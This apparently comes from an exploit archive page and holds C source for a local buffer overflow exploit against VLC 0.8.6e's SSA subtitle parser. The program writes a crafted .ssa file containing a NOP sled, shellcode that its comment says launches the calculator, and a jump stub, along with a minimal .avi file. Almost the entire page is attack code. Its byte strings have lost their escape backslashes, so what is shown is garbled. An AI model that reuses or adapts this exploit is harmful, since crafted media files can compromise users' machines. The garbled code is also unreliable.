Home / os / win10

vlc086e-overflow.txt

Posted on 15 March 2008

/*
VLC <=0.8.6.e
Subtitle parsing local buffer overflow exploit
Creadit to cuongmx@gmail.com vs Look2Me @
Tested on windows XP Pro SP2

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char ssa_header[]=
"[Script Info]
"
"Title: VLC <= 0.8.6c,e buffer-overflow
"
"ScriptType: v4.00
"
"Collisions: Normal
"
"[V4 Styles]
"
"[Events]
"
"Dialogue:";

// execute calculator from Meta
char shellcode[] =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x3d"
"xbaxb1xd9x83xebxfcxe2xf4xc1x52xf5xd9x3dxbax3ax9c"
"x01x31xcdxdcx45xbbx5ex52x72xa2x3ax86x1dxbbx5ax90"
"xb6x8ex3axd8xd3x8bx71x40x91x3ex71xadx3ax7bx7bxd4"
"x3cx78x5ax2dx06xeex95xddx48x5fx3ax86x19xbbx5axbf"
"xb6xb6xfax52x62xa6xb0x32xb6xa6x3axd8xd6x33xedxfd"
"x39x79x80x19x59x31xf1xe9xb8x7axc9xd5xb6xfaxbdx52"
"x4dxa6x1cx52x55xb2x5axd0xb6x3ax01xd9x3dxbax3axb1"
"x01xe5x80x2fx5dxecx38x21xbex7axcax89x55xc4x69x3b"
"x4exd2x29x27xb7xb4xe6x26xdaxd9xd0xb5x5exbaxb1xd9";

char szJMP[]=
"x90x90xe9x38xffxffxffxebxf9x90x90x0bx0bx38x00";

char szAVI[]=
"x52x49x46x46xCx0x0x0x41x56x49x20x4Cx49x53x54x00x00x00";

main()
{
int i,j,k;
printf("Give me your VLC version:
");
printf("1> version 8.06.c
");
printf("2> version 8.06.d
");
printf("3> version 8.06.e
Chose:");
j=getchar();
switch(j)
{
case '1': k=165254;break;
case '2': printf("
I haven't got this version!
 Good Luck :-)");
getchar();
return 0;break;
case '3': k=165286;break;
}
k=k-sizeof(shellcode);
printf("
[+] Creating .ssa file ...");
FILE*    f;
char    szBuffer[170000];
char    szBuffer2[200];

strcpy(szBuffer,ssa_header);    // header of ssa

memset((szBuffer+sizeof(ssa_header)-1),'x90',k);
szBuffer[k+sizeof(ssa_header)]='x00';
strcpy(szBuffer2,shellcode);
strcat(szBuffer2,szJMP);
strcat(szBuffer,szBuffer2);

f=fopen("Bof-VLC.ssa","wb");
if(f==NULL)
{
printf("Can't create file");
exit;
}
fwrite(szBuffer,1,strlen(szBuffer),f);  // write header
fclose(f);
printf("
[+] .ssa file successfully create!");

printf("
[+] Creation .avi file ...");
f=fopen("Bof-VLC.avi","wb");
if(f==NULL)
{
printf("Can't create file");
exit;
}
fwrite(szAVI,1,sizeof(szAVI),f);  // write header
fclose(f);
printf("
[+] .avi file successfully create!");
getchar();
}

 

TOP

Malware :

Exploits :